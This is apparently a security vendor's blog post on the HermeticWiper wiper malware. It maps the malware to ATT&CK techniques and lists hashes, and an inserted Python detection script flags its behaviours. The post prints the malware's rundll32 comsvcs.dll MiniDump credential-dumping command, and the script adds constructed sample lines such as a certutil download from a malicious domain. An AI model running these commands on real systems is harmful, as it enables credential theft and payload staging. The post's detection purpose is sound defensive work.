On February 23rd, 2022, ESET and Symantec shared their research on a new type of destructive wiper malware and named it HermeticWiper [1],[2]. Picus Labs updated the Picus Threat Library with multiple HermeticWiper destructive malware attack simulations. In this blog, we share information on how to simulate and mitigate HermeticWiper attacks.
Test your security controls against HermeticWiper Malware
HermeticWiper is a disk-wiping destructive malware that disguises itself as ransomware, similar to the NotPetya and WhisperGate wiper malware. The wiper damages the Master Boot Record (MBR) and bricks the infected system. Then, HermeticWiper drops a ransom note. The ransom note should not be trusted because it is impossible to recover data after the MBR is damaged.
The wiper malware gains initial access to its target using SMB and Tomcat vulnerabilities found on the target's endpoint devices. Once it gains initial access, HermeticWiper downloads a malicious JPEG file using encoded PowerShell commands. After the download, a series of scheduled tasks is set up on the victim system; these tasks check network connectivity and dump credentials. For its final act, the malware deploys a wiper (Trojan.KillDisk) and damages the MBR irrevocably.
Using the Picus Continuous Security Validation Platform, you can test your security controls against the HermeticWiper malware. We advise you to simulate destructive HermeticWiper malware attacks and determine whether your security controls can prevent them or not. Picus Threat Library includes the following threats to simulate HermeticWiper.
| Threat Name |
| --- |
| HermeticWiper Wiper Malware .EXE File Download (3 variants) |
T1190 Exploit Public Facing Application
HermeticWiper destructive malware exploits SMB and Tomcat vulnerabilities found on the target's endpoint devices to place a webshell.
T1053.005 Scheduled Task/Job: Scheduled Task
HermeticWiper malware utilizes Scheduled Tasks to run CertUtil. CertUtil checks connectivity to trustsecpro.com and whatismyip.com.
T1059.001 Command and Scripting Interpreter: PowerShell
T1059.003 Command and Scripting Interpreter: Windows Command Shell
HermeticWiper uses PowerShell and the Windows Command Shell to execute its malicious commands. These commands download additional payloads and the wiper itself from a compromised web server that the adversaries control.
T1505.003 Server Software Component: Web Shell
After initial access, HermeticWiper places a webshell to establish a solid foothold in the victim’s network.
T1070.004 Indicator Removal on Host: File Deletion
HermeticWiper is a wiper malware that deletes the Master Boot Record (MBR) and files in the victim system. It also deletes itself to evade malware analysis.
T1218.011 Signed Binary Proxy Execution: Rundll32
HermeticWiper uses the built-in Rundll32 executable for credential dumping.
T1553.002 Subvert Trust Controls: Code Signing
HermeticWiper masquerades as a legitimate binary because the executable is signed with a code-signing certificate from Hermetica Digital.
T1003 OS Credential Dumping
HermeticWiper malware uses the following command for credential dumping.
```
cmd.exe /Q /c powershell -c "rundll32 C:\windows\system32\comsvcs.dll MiniDump 600 C:\asm\appdata\local\microsoft\windows\winupd.log full" 1> \\127.0.0.1\ADMIN$\__1638457529.1247072 2>&1
```
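As an added example (not Picus code and not part of the original post), the following Python checks process-creation command lines for the T1053.005 CertUtil connectivity checks and the T1003 comsvcs.dll MiniDump command described above. The sample events, the rule names and the CertUtil options used in the sample are constructed assumptions, not telemetry from an infection.

```python
import re

# Constructed sample process-creation events (image, command line), loosely
# modelled on Sysmon Event ID 1; not real telemetry. The first mirrors the
# credential-dumping command shown above, the second a CertUtil reachability
# check to one of the two domains, and the last two are benign look-alikes.
SAMPLE_EVENTS = [
    (r"C:\Windows\System32\cmd.exe",
     r'cmd.exe /Q /c powershell -c "rundll32 C:\windows\system32\comsvcs.dll MiniDump 600 '
     r'C:\asm\appdata\local\microsoft\windows\winupd.log full" 1> \\127.0.0.1\ADMIN$\__1638457529.1247072 2>&1'),
    (r"C:\Windows\System32\certutil.exe",
     "certutil -urlcache -split -f https://trustsecpro.com/ out.tmp"),
    (r"C:\Windows\System32\certutil.exe",
     "certutil -verify -urlfetch cert.cer"),
    (r"C:\Windows\System32\rundll32.exe",
     "rundll32.exe shell32.dll,Control_RunDLL"),
]

# Detection rules derived from the behaviours this page describes. Each entry
# is (rule name, case-insensitive pattern applied to the full command line).
RULES = [
    ("T1003 comsvcs.dll MiniDump via rundll32",
     re.compile(r"rundll32.*comsvcs\.dll.*MiniDump", re.I)),
    ("T1053.005 CertUtil connectivity check",
     re.compile(r"certutil.*(trustsecpro\.com|whatismyip\.com)", re.I)),
    # The dump command above redirects its output to the local ADMIN$ share
    # under a numeric file name; that redirect is a useful standalone signal.
    ("Output redirected to loopback ADMIN$ share",
     re.compile(r"\\\\127\.0\.0\.1\\ADMIN\$\\__\d+\.\d+", re.I)),
]


def classify(cmdline: str) -> list:
    """Return the names of every rule whose pattern matches the command line."""
    return [name for name, pattern in RULES if pattern.search(cmdline)]


def scan(events) -> list:
    """Return (rule name, image, command line) for every rule hit across events."""
    return [(name, image, cmdline)
            for image, cmdline in events
            for name in classify(cmdline)]


if __name__ == "__main__":
    for name, image, cmdline in scan(SAMPLE_EVENTS):
        print(f"[{name}] {image}: {cmdline}")
```

Feed real process-creation events through `scan()` in place of the constructed list; the patterns match on command line only, so pair them with parent-process and user context before alerting.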
T1012 Query Registry
HermeticWiper checks the language settings and the name of the infected computer by querying the registry keys and values given below.
| Registry key | Value |
| --- | --- |
| HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\EXTENDEDLOCALE | EN-US |
| HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\CUSTOMLOCALE | EN-US |
| HKLM\SYSTEM\CONTROLSET001\CONTROL\NLS\CUSTOMLOCALE | EMPTY |
| HKLM\SYSTEM\CONTROLSET001\CONTROL\COMPUTERNAME\ACTIVECOMPUTERNAME | COMPUTERNAME |
T1082 System Information Discovery
HermeticWiper reads the cryptographic machine GUID from the "MACHINEGUID" value of the "HKLM\SOFTWARE\MICROSOFT\CRYPTOGRAPHY" registry key.
T1561.002 Disk Wipe: Disk Structure Wipe
HermeticWiper irreversibly damages the Master Boot Record (MBR) of the victim’s system. As a result, the victim's computer does not boot up.
| MD5 | SHA-1 | SHA-256 |
| --- | --- | --- |
| d5d2c4ac6c724cd63b69ca054713e278 | f32d791ec9e6385a91b45942c230f52aff1626df | 4dc13bb83a16d4ff9865a51b3e4d24112327c526c1392e14d56f20d6f4eaf382 |
| 84ba0197920fd3e2b7dfa719fee09d2f | 912342f1c840a42f6b74132f8a7c4ffe7d40fb77 | 0385eeab00e946a302b24a91dea4187c1210597b8e17cd9e2230450f5ece21da |
| 3f4a16b29f2f0532b7ce3e7656799125 | 61b25d11392172e587d8da3045812a66c3385451 | 1bc44eef75779e3ca1eefb8ff5a64807dbc942b1e4a2672d77b9f6928d292591 |
[1] "HermeticWiper: New data-wiping malware hits Ukraine", WeLiveSecurity, 24 February 2022. [Online]. Available at: https://www.welivesecurity.com/2022/02/24/hermeticwiper-new-data-wiping-malware-hits-ukraine/.
[2] "Ukraine: Disk-wiping Attacks Precede Russian Invasion", Symantec Threat Intelligence Blog. [Online]. Available at: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia.